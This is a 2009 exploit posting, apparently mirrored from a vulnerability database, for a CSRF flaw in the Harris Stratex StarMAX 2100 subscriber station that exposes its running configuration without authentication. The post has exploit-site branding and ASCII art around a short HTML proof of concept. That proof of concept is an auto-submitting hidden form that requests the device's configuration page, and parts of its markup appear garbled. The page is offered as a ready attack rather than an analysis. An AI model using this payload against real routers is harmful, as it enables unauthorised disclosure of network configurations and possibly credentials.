Harris Stratex StarMAX subscriber station running config CSRF exploit

2009-11-05T00:00:00
ID SECURITYVULNS:DOC:22736
Type securityvulns
Reporter Securityvulns
Modified 2009-11-05T00:00:00

Description

===================================================================== Harris Stratex StarMAX subscriber station running config CSRF exploit =====================================================================

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ 1 1 /' \ /'`\ /\ \ /'`\ 0 0 /\, \ /\\/\\ \ \ \ \ ,\/\ \/\ \ _ 1 1 \//\ \ /' _ `\ \/\ \//\< /'\ \ \/\ \ \ \ \/\`'_\ 0 0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \/\ \ \\ \ \\ \ \ \/ 1 1 \ \\ \\ \\\ \ \ \_/\ \\\ \__\\ \____/\ \\ 0 0 \//\//\//\ \\ \// \// \/__/ \/___/ \// 1 1 \ \_/ >> Exploit database separated by exploit 0 0 \// type (local, remote, DoS, etc.) 1 1 0 -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-1

[+] Discovered By : Inj3ct0r

[+] Site : Inj3ct0r.com

[+] support e-mail : submit[at]inj3ct0r.com

I found CSRF vulnerability in Harris Stratex 2100 subscriber station. Using this code i am able to view the current configuration of the subscriber station without authentication from both LAN & WAN

Product :StarMAX 2100 subscriber station Affected Application Version: 3.0.4.1.7.C Vendor submission:07-04-2009 Vendor Response:No Vulnerability:Able to view the running configuration without authentication from both LAN & WAN

<html> <body> <body xonload="config.submit();"> <form name=config method="get" action="http:192.168.1.1/frameCmd6.html"> <input type=hidden name=showRunConfig value="Current Configuration"> </form> </body> </html>

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

ThE End =] Visit my proj3ct :

http://inj3ct0r.com http://inj3ct0r.org http://inj3ct0r.net

~ - [ [ : Inj3ct0r : ] ]